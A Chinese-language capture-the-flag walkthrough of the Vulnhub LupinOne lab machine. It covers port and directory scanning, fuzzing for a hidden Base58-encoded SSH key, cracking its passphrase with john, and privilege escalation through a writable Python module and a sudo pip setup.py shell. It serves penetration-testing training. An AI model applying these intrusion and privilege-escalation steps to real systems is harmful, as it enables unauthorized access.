01-EmpireLupinOne

Administrator

2023-06-26

Vulnhub Linux

信息收集

 ┌──(root㉿kali)-[~]
 └─# nmap -sV -A 192.168.25.134
 Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-27 00:14 EDT
 Nmap scan report for 192.168.25.134
 Host is up (0.00024s latency).
 Not shown: 998 closed tcp ports (reset)
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey: 
 |   3072 ed:ea:d9:d3:af:19:9c:8e:4e:0f:31:db:f2:5d:12:79 (RSA)
 |   256 bf:9f:a9:93:c5:87:21:a3:6b:6f:9e:e6:87:61:f5:19 (ECDSA)
 |_  256 ac:18:ec:cc:35:c0:51:f5:6f:47:74:c3:01:95:b4:0f (ED25519)
 80/tcp open  http    Apache httpd 2.4.48 ((Debian))
 | http-robots.txt: 1 disallowed entry 
 |_/~myfiles
 |_http-server-header: Apache/2.4.48 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 MAC Address: 00:0C:29:9A:2D:7D (VMware)
 Device type: general purpose
 Running: Linux 4.X|5.X
 OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
 OS details: Linux 4.15 - 5.8
 Network Distance: 1 hop
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
 TRACEROUTE
 HOP RTT     ADDRESS
 1   0.24 ms 192.168.25.134

 ===============================================================
 Gobuster v3.5
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
 ===============================================================
 [+] Url:                     http://192.168.25.134/
 [+] Method:                  GET
 [+] Threads:                 10
 [+] Wordlist:                /home/kali/Pentest_dict/directoryDicts/top7000.txt
 [+] Negative Status codes:   404
 [+] User Agent:              gobuster/3.5
 [+] Timeout:                 10s
 ===============================================================
 2023/06/27 00:15:30 Starting gobuster in directory enumeration mode
 ===============================================================
 //robots.txt          (Status: 200) [Size: 34]
 //index.html          (Status: 200) [Size: 333]
 //manual              (Status: 301) [Size: 317] [--> http://192.168.25.134/manual/]                                                                       
 //image               (Status: 301) [Size: 316] [--> http://192.168.25.134/image/]                                                                        
 //server-status       (Status: 403) [Size: 279]
 [ERROR] 2023/06/27 00:15:31 [!] parse "http://192.168.25.134//database/%": invalid URL escape "%"
 //image/              (Status: 200) [Size: 953]
 //manual/             (Status: 200) [Size: 676]
 ===============================================================
 Gobuster v3.5
 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
 ===============================================================
 [+] Url:                     http://192.168.25.134/
 [+] Method:                  GET
 [+] Threads:                 10
 [+] Wordlist:                /home/kali/Pentest_dict/directoryDicts/fileName10000.txt
 [+] Negative Status codes:   404
 [+] User Agent:              gobuster/3.5
 [+] Timeout:                 10s
 ===============================================================
 2023/06/27 00:16:05 Starting gobuster in directory enumeration mode
 ===============================================================
 /robots.txt           (Status: 200) [Size: 34]
 /.htpasswd            (Status: 403) [Size: 279]
 /.htaccess            (Status: 403) [Size: 279]
 /.htpasswds           (Status: 403) [Size: 279]
 Progress: 6952 / 10289 (67.57%)
 ===============================================================
 2023/06/27 00:16:06 Finished
 ===============================================================

手工对端口验证和信息整理

80

主也没有什么，我们继续访问robots.txt发现网页提示

 User-agent: *
 Disallow: /~myfiles

打开对应的目录发现是Error 404，在旧版本的Apache服务器中，~ 指代用户主目录，我们可以尝试找到与此相似的路径，使用wfuzz工具对其路径进行测试，发现~secret目录

 ┌──(root㉿kali)-[~]
 └─# wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt --hc 403,404 http://192.168.25.134/~FUZZ 
  /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
 ********************************************************
 * Wfuzz 3.1.0 - The Web Fuzzer                         *
 ********************************************************
 
 Target: http://192.168.25.134/~FUZZ
 Total requests: 951
 
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload     
 =====================================================================
 000000718:   301        9 L      28 W       318 Ch      "secret"    
 
 Total time: 0
 Processed Requests: 951
 Filtered Requests: 950
 Requests/sec.: 0

访问该网页，提示有ssh文件让我们查找，并且得知用户名为icex64

 Hello Friend, Im happy that you found my secret diretory, I created like this to share with you my create ssh private key file,
 Its hided somewhere here, so that hackers dont find it and crack my passphrase with fasttrack.
 I'm smart I know that.
 Any problem let me know
 Your best friend icex64

接下来继续在该路径下搜索文件，得到.mysecret.txt文件

 ┌──(root㉿kali)-[~]
 └─# wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  --hc 404,403 -u http://192.168.25.134/~secret/.FUZZ.txt
  /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
 ********************************************************
 * Wfuzz 3.1.0 - The Web Fuzzer                         *
 ********************************************************
 
 Target: http://192.168.25.134/~secret/.FUZZ.txt
 Total requests: 220560
 
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload     
 =====================================================================
 000000001:   200        5 L      54 W       331 Ch      "# directory-list-2.3-medium.txt"   
 000000007:   200        5 L      54 W       331 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"       
 000000003:   200        5 L      54 W       331 Ch      "# Copyright 2007 James Fisher"     
 000000013:   200        5 L      54 W       331 Ch      "#"         
 000000005:   200        5 L      54 W       331 Ch      "# This work is licensed under the Creative Commons"        
 000000009:   200        5 L      54 W       331 Ch      "# Suite 300, San Francisco, California, 94105, USA."       
 000000004:   200        5 L      54 W       331 Ch      "#"         
 000000011:   200        5 L      54 W       331 Ch      "# Priority ordered case sensative list, where entries were found"      
 000000006:   200        5 L      54 W       331 Ch      "# Attribution-Share Alike 3.0 License. To view a copy of this"         
 000000002:   200        5 L      54 W       331 Ch      "#"         
 000000012:   200        5 L      54 W       331 Ch      "# on atleast 2 different hosts"    
 000000008:   200        5 L      54 W       331 Ch      "# or send a letter to Creative Commons, 171 Second Street,"
 000000010:   200        5 L      54 W       331 Ch      "#"         
 000073703:   200        1 L      1 W        4689 Ch     "mysecret"  
 Total time: 0
 Processed Requests: 220560
 Filtered Requests: 220546
 Requests/sec.: 0

访问得到

 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

使用Base58解码得到

`shell`

在本地创建文件key，将私钥保存到其中，然后使用john工具破解密码。得到密码为P@55w0rd!，利用账密登录

 ┌──(root㉿kali)-[/home/kali/Desktop]
 └─# python2 /usr/share/john/ssh2john.py key > keyhash
     john keyhash --wordlist=/usr/share/wordlists/fasttrack.txt
 Using default input encoding: UTF-8
 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
 Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
 Cost 2 (iteration count) is 16 for all loaded hashes
 Will run 4 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 P@55w0rd!        (key)     
 1g 0:00:00:01 DONE (2023-06-27 05:04) 0.5780g/s 36.99p/s 36.99c/s 36.99C/s Winter2015..password2
 Use the "--show" option to display all of the cracked passwords reliably
 Session completed.

水平越权

将key文件权限设为600(否则无法连接)，然后利用ssh连接icex64用户，进入后就能拿到user.txt

 chmod 600 key
 ssh icex64@192.168.164.190 -i key
 3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}

我们首先看一下这个用户可以运行什么文件，发现可以运行一个python文件

 icex64@LupinOne:~$ sudo -l
 Matching Defaults entries for icex64 on LupinOne:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User icex64 may run the following commands on LupinOne:
     (arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py

查看了python文件，发现它引用了webbrowser模块，我们去python目录下看能不能对这个模块进行修改，让它返回一个shell，我们通过find找到该文件的位置，查看其权限，发现可以写入内容

 icex64@LupinOne:~$ find /usr/ -name '*webbrowser*'
 /usr/lib/python3.9/webbrowser.py
 /usr/lib/python3.9/__pycache__/webbrowser.cpython-39.pyc
 icex64@LupinOne:~$ ls -l /usr/lib/python3.9/webbrowser.py
 -rwxrwxrwx 1 root root 24087 Oct  4  2021 /usr/lib/python3.9/webbrowser.py

我们可以直接编辑该文件，写入反向shell或者是调用shell，获得arsene用户shell

 icex64@LupinOne:~$ vi /usr/lib/python3.9/webbrowser.py
 icex64@LupinOne:~$ sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
 arsene@LupinOne:/home/icex64$ whoami
 arsene

权限提升

拿到arsene用户权限后，查看sudo -l，发现可以免密执行/usr/bin/pip

 arsene@LupinOne:/home/icex64$ sudo -l
 Matching Defaults entries for arsene on LupinOne:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User arsene may run the following commands on LupinOne:
     (root) NOPASSWD: /usr/bin/pip

在arsene的目录下，创建setup.py文件，里面写入我们想运行的python脚本，如反弹shell，然后利用pip install以root权限执行。

 arsene@LupinOne:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > setup.py
 arsene@LupinOne:~$ sudo pip install .
 Processing /home/arsene
 # ls
 heist.py  note.txt  setup.py
 # cd
 # pwd
 /root
 # ls
 root.txt
 # cat root.txt
 3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}